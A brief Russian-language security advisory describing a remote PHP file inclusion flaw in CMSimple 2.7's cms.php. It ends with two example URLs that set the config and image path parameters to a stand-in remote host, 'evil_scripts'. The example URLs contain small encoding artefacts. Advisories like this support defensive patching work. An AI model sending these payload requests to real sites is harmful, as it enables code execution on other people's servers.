Программа: cmsimple 2.7
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах «pth['file']['config']» и «pth['file']['image']» сценарием cms.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
cmsimple2_7/cmsimple/cms.php?pth['file']['config']=3Dhttp://evil_scripts?
cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=3Dhttp://evil_scripts?